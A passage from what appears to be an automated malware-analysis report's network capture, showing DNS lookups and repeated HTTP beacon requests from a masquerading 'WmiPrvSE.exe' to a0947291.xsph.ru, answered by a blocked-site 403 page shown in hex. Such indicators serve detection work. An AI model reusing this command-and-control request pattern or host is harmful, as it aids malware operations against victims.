                                                Apr 25, 2024 10:21:03.168504000 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168515921 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168544054 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168584108 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168620110 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168649912 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168659925 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168673992 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168700933 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168739080 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168745041 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168777943 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168816090 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168850899 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168853998 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168894053 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168931961 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168968916 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.168999910 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.168999910 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169011116 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169049025 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169085026 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169101000 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169121981 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169148922 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169193983 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169266939 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.169276953 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169317961 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169356108 CEST8049748141.8.194.74192.168.2.4
                                                Apr 25, 2024 10:21:03.169375896 CEST4974880192.168.2.4141.8.194.74
                                                Apr 25, 2024 10:21:03.171595097 CEST4974880192.168.2.4141.8.194.74

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 25, 2024 10:17:14.977189064 CEST6334053192.168.2.41.1.1.1
                                                Apr 25, 2024 10:17:15.209439993 CEST53633401.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 25, 2024 10:17:14.977189064 CEST192.168.2.41.1.1.10x699eStandard query (0)a0947291.xsph.ruA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 25, 2024 10:17:15.209439993 CEST1.1.1.1192.168.2.40x699eNo error (0)a0947291.xsph.ru141.8.194.74A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • a0947291.xsph.ru

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449736141.8.194.7480
                                                TimestampBytes transferredDirectionData
                                                Apr 25, 2024 10:17:15.527973890 CEST542OUTGET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:17:15.769170046 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:17:15 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}
                                                Apr 25, 2024 10:17:15.769191980 CEST1289INData Raw: 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69 64 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 68 65 69 67 68 74 3a 34 35 30 70 78 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 6c 65 66 74 2d 73 69
                                                Data Ascii: .wrapper .content .left-side{display:table;height:450px}.wrapper .content .left-side .error-block{display:-webkit-inline-box;display:-webkit-inline-flex;display:-moz-inline-box;display:-ms-inline-flexbox;display:inline-flex;-webkit-box-orient:
                                                Apr 25, 2024 10:17:15.769227982 CEST1289INData Raw: 65 7b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 72 69 67 68 74 2d 73 69 64 65 20 2e 69 6d 61 67 65 2d 63 6f 6e
                                                Data Ascii: e{display:table}.wrapper .content .footer,.wrapper .content .right-side .image-container{display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex}.wrapper .content .right-side .image-container{width:100%;heigh
                                                Apr 25, 2024 10:17:15.769274950 CEST1289INData Raw: 61 63 65 3a 70 72 65 2d 6c 69 6e 65 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 20 2e 66 6f 6f 74 65 72 5f 5f 72 69 67 68 74 73 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65
                                                Data Ascii: ace:pre-line}.wrapper .content .footer__rights{font-size:10px;font-weight:700;line-height:138%;color:#000;opacity:.4}.wrapper .content .footer__rights .year{font-weight:700}@media screen and (max-width:1105px){.wrapper .content{padding-left:77
                                                Apr 25, 2024 10:17:15.769318104 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 62 6c 6f 63 6b 5f 5f 6e 61 6d 65 22 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 3c 62 3e 34 30 33 30 3c 2f 62 3e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: <p class="error-block__name"> <b>4030</b></p> <p class="error-block__en">Error 4030. <b> Website is blocked.Please try again later.</b></p>
                                                Apr 25, 2024 10:17:15.769367933 CEST1289INData Raw: 20 31 39 37 2e 30 35 37 20 36 39 2e 30 36 34 34 20 31 39 38 2e 30 31 34 20 36 35 2e 32 34 35 34 43 31 39 38 2e 35 38 37 20 36 33 2e 39 30 38 37 20 31 39 36 2e 36 37 35 20 36 33 2e 35 32 36 38 20 31 39 36 2e 32 39 32 20 36 34 2e 36 37 32 35 5a 22
                                                Data Ascii: 197.057 69.0644 198.014 65.2454C198.587 63.9087 196.675 63.5268 196.292 64.6725Z" fill="black"/> <path d="M172.767 100.762C171.428 100.189 169.898 99.9985 168.559 99.9985C167.602 98.2799 168.559 96.3704 169.515 94.8428C169.898 94.27 1
                                                Apr 25, 2024 10:17:15.769419909 CEST1289INData Raw: 32 2e 31 36 34 20 39 36 2e 31 37 38 34 20 31 34 31 2e 32 30 38 20 39 37 2e 31 33 33 31 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 33 39 2e 31 30 34 20 39 32 2e 33 36 30 35 4c 31
                                                Data Ascii: 2.164 96.1784 141.208 97.1331Z" fill="black"/> <path d="M139.104 92.3605L128.393 95.6066C127.245 95.9885 127.628 97.7071 128.967 97.5161C132.601 96.3704 136.235 95.4157 139.678 94.27C140.634 93.8881 140.251 92.1695 139.104 92.3605Z" fi
                                                Apr 25, 2024 10:17:15.769438982 CEST1289INData Raw: 30 32 20 39 39 2e 39 39 39 31 20 32 39 34 2e 30 32 39 20 39 39 2e 39 39 39 31 20 32 39 33 2e 34 35 35 20 31 30 30 2e 33 38 31 43 32 39 30 2e 33 39 35 20 31 30 33 2e 34 33 36 20 32 38 37 2e 31 34 33 20 31 30 36 2e 34 39 31 20 32 38 34 2e 30 38 33
                                                Data Ascii: 02 99.9991 294.029 99.9991 293.455 100.381C290.395 103.436 287.143 106.491 284.083 109.547C283.892 109.738 260.749 128.26 251.568 139.717C247.36 137.043 243.152 134.561 238.944 131.888C239.136 130.36 239.136 128.833 238.37 127.496C236.267 123.
                                                Apr 25, 2024 10:17:15.769459963 CEST1289INData Raw: 36 39 2e 31 30 30 39 20 36 37 2e 33 34 36 36 20 37 35 2e 30 33 30 31 20 37 33 2e 32 36 36 31 43 38 30 2e 31 39 34 33 20 37 38 2e 34 32 31 37 20 38 35 2e 35 34 39 37 20 38 33 2e 31 39 35 35 20 39 31 2e 36 37 30 32 20 38 37 2e 32 30 35 35 43 39 34
                                                Data Ascii: 69.1009 67.3466 75.0301 73.2661C80.1943 78.4217 85.5497 83.1955 91.6702 87.2055C94.7304 89.115 97.9819 90.8335 101.425 92.1702C103.146 102.481 105.059 112.984 109.649 122.34C109.649 122.34 109.649 122.34 109.458 122.34C100.468 125.586 92.0527
                                                Apr 25, 2024 10:17:15.769475937 CEST1289INData Raw: 35 37 33 38 20 31 32 38 2e 30 36 39 20 31 30 2e 39 35 36 33 20 31 32 38 2e 38 33 33 43 31 31 2e 33 33 38 38 20 31 32 39 2e 34 30 35 20 31 32 2e 31 30 33 39 20 31 32 39 2e 37 38 37 20 31 32 2e 36 37 37 37 20 31 33 30 2e 31 36 39 43 31 33 2e 30 36
                                                Data Ascii: 5738 128.069 10.9563 128.833C11.3388 129.405 12.1039 129.787 12.6777 130.169C13.0602 130.551 13.634 130.742 14.0165 130.933C12.1039 131.506 10.3825 132.843 9.61744 134.752C9.42617 135.134 9.8087 135.516 9.99997 135.898C13.4427 138.38 17.4593 1
                                                Apr 25, 2024 10:17:16.016479969 CEST1289INData Raw: 32 36 2e 38 34 38 20 36 37 2e 35 37 30 38 20 33 32 38 2e 31 38 35 43 37 32 2e 39 32 36 32 20 33 32 39 2e 39 30 33 20 37 39 2e 30 34 36 37 20 33 32 39 2e 31 33 39 20 38 34 2e 34 30 32 31 20 33 32 37 2e 38 30 33 43 38 39 2e 35 36 36 32 20 33 32 36
                                                Data Ascii: 26.848 67.5708 328.185C72.9262 329.903 79.0467 329.139 84.4021 327.803C89.5662 326.466 94.5391 324.748 99.1295 322.265C108.501 317.682 116.726 311.19 123.42 303.17C123.42 308.708 123.42 314.054 123.803 319.592C123.42 319.401 123.229 319.401 12
                                                Apr 25, 2024 10:17:16.287343979 CEST518OUTGET /1606aca9.php?Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&Kp0YJjcTuh6rHq0W3cybAgWVGNOKtko=Imszz&BTtKkvEZk=Up7qPN7oSeS HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/json
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                Host: a0947291.xsph.ru
                                                Apr 25, 2024 10:17:16.528044939 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:17:16 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 6a 75 73 74 69 66 79 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d
                                                Data Ascii: dfbe<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;display:-webkit-flex;display:-moz-box;display:-ms-flexbox;display:flex;-webkit-box-pack:center;-webkit-justify-content:center;-moz-box-pack:center;-ms-flex-pack:center;justify-content:center}.wrapper .content{width:inherit;max-width:1032px;height:100%;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-webkit-flex-direction:row;-moz-box-orient:horizontal;-moz-box-direction:normal;-ms-flex-direction:row;flex-direction:row;padding:128px 16px 0;min-height:-moz-calc(100vh - 128px);min-height:calc(100vh - 128px);-webkit-box-sizing:content-box;-moz-box-sizing:content-box;box-sizing:content-box;-webkit-box-pack:justify;-webkit-justify-content:space-between;-moz-box-pack:justify;-ms-flex-pack:justify;justify-content:space-between;position:relative}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449743141.8.194.74808044C:\Users\Default\Downloads\WmiPrvSE.exe
                                                TimestampBytes transferredDirectionData
                                                Apr 25, 2024 10:18:51.364372969 CEST576OUTGET /1606aca9.php?cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG&79de6aec23413a4ab0f953d98ee3ec95=a30d8b5724e653dc8148bb63fff1b326&82d9326c5696c9c72e8032934ef8fcec=wYhFWZ1EDM4cjY4Y2YwYGZ4QTZ2MDM3EzMygTN3YjZ0IjNzMGZ4cDO&cucOyHPjcFsCiapNYlxb8AP6pF=a3qL3&vw0E6VKq1Z0QnGVYYOq=dzcegjt&zp=3ydwnyJbQmvHkZpB8uBecfsG HTTP/1.1
                                                Accept: */*
                                                Content-Type: text/html
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                Host: a0947291.xsph.ru
                                                Connection: Keep-Alive
                                                Apr 25, 2024 10:18:51.620924950 CEST1289INHTTP/1.1 403 Forbidden
                                                Server: openresty
                                                Date: Thu, 25 Apr 2024 08:18:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Vary: Accept-Encoding
                                                Data Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 